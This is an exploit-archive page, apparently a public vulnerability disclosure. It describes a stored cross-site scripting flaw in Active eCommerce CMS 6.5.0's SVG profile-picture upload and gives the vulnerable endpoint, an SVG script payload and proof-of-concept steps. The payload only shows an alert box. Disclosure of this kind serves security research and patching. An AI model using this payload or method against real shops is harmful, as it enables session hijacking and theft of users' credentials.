Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Active eCommerce CMS 6.5.0 Cross Site Scripting[6]
- Authored by Sajibe Kanti[7]
-
Active eCommerce CMS version 6.5.0 suffers from a persistent cross site scripting vulnerability.
- SHA-256 |
bd1b8525d134e8539153037cbd2b3ebad280be2852c627e63b5bf9be93e5ebd0
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
# Exploit Title: Active eCommerce CMS 6.5.0 - 'svg' Stored Cross-Site
Scripting (XSS)
# Date: 19/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: ActiveITzone
# Vendor Homepage: https://activeitzone.com/
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405
# Version: 6.5.0
# Tested on: Live ( Centos & Litespeed Web Server)
# Demo Link : https://demo.activeitzone.com/ecommerce/
# Description #
The Active eCommerce CMS 6.5.0 application has a vulnerability in the
profile picture upload feature that allows for stored cross-site scripting
(XSS) attacks. Specifically, the vulnerability lies in the handling of
"svg" image files, which can contain malicious code. An attacker can
exploit this vulnerability by uploading a specially crafted "svg" image
file as a profile picture, which will then be executed by the application
when the user views the profile. This can allow the attacker to steal
sensitive information, such as login credentials, or to perform other
malicious actions on the user's behalf. This vulnerability highlights the
importance of proper input validation and image file handling in web
application development.
# Exploit Details #
# Vulnerable Path : /aiz-uploader/upload
# Parameter: files (POST)
# Vector: <svg version="1.1" baseProfile="full" xmlns="
http://www.w3.org/2000/svg">
<rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("haha XSS");
</script>
</svg>
# Proof of Concept (PoC) : Exploit #
1) Goto: https://localhost
2) Click Registration
3) Login Your Account
4) Go Manage Profile
5) Now Upload Given Vector as anyname.svg (you must put vector code in
anyname.svg file)
6) After Upload Clic to view Your profile picture
7) XSS Popup Will Fired
# Image PoC : Reference Image #
1) Payload Fired: https://prnt.sc/cW0F_BtpyMcv
File Tags
- ActiveX[17] (932)
- Advisory[18] (79,938)
- Arbitrary[19] (15,753)
- BBS[20] (2,859)
- Bypass[21] (1,631)
- CGI[22] (1,019)
- Code Execution[23] (6,955)
- Conference[24] (674)
- Cracker[25] (840)
- CSRF[26] (3,294)
- DoS[27] (22,689)
- Encryption[28] (2,353)
- Exploit[29] (50,495)
- File Inclusion[30] (4,172)
- File Upload[31] (948)
- Firewall[32] (821)
- Info Disclosure[33] (2,671)
- Intrusion Detection[34] (869)
- Java[35] (2,927)
- JavaScript[36] (823)
- Kernel[37] (6,330)
- Local[38] (14,225)
- Magazine[39] (586)
- Overflow[40] (12,448)
- Perl[41] (1,418)
- PHP[42] (5,099)
- Proof of Concept[43] (2,293)
- Protocol[44] (3,441)
- Python[45] (1,468)
- Remote[46] (30,115)
- Root[47] (3,516)
- Rootkit[48] (501)
- Ruby[49] (596)
- Scanner[50] (1,633)
- Security Tool[51] (7,799)
- Shell[52] (3,112)
- Shellcode[53] (1,206)
- Sniffer[54] (889)
- Spoof[55] (2,173)
- SQL Injection[56] (16,130)
- TCP[57] (2,382)
- Trojan[58] (686)
- UDP[59] (878)
- Virus[60] (662)
- Vulnerability[61] (31,195)
- Web[62] (9,390)
- Whitepaper[63] (3,733)
- x86[64] (946)
- XSS[65] (17,515)
- Other[66]
File Archives
- January 2023[67]
- December 2022[68]
- November 2022[69]
- October 2022[70]
- September 2022[71]
- August 2022[72]
- July 2022[73]
- June 2022[74]
- May 2022[75]
- April 2022[76]
- March 2022[77]
- February 2022[78]
- Older[79]
Systems
- AIX[80] (426)
- Apple[81] (1,936)
- BSD[82] (370)
- CentOS[83] (55)
- Cisco[84] (1,917)
- Debian[85] (6,656)
- Fedora[86] (1,690)
- FreeBSD[87] (1,242)
- Gentoo[88] (4,288)
- HPUX[89] (878)
- iOS[90] (334)
- iPhone[91] (108)
- IRIX[92] (220)
- Juniper[93] (67)
- Linux[94] (44,494)
- Mac OS X[95] (684)
- Mandriva[96] (3,105)
- NetBSD[97] (255)
- OpenBSD[98] (479)
- RedHat[99] (12,552)
- Slackware[100] (941)
- Solaris[101] (1,609)
- SUSE[102] (1,444)
- Ubuntu[103] (8,249)
- UNIX[104] (9,181)
- UnixWare[105] (185)
- Windows[106] (6,514)
- Other[107]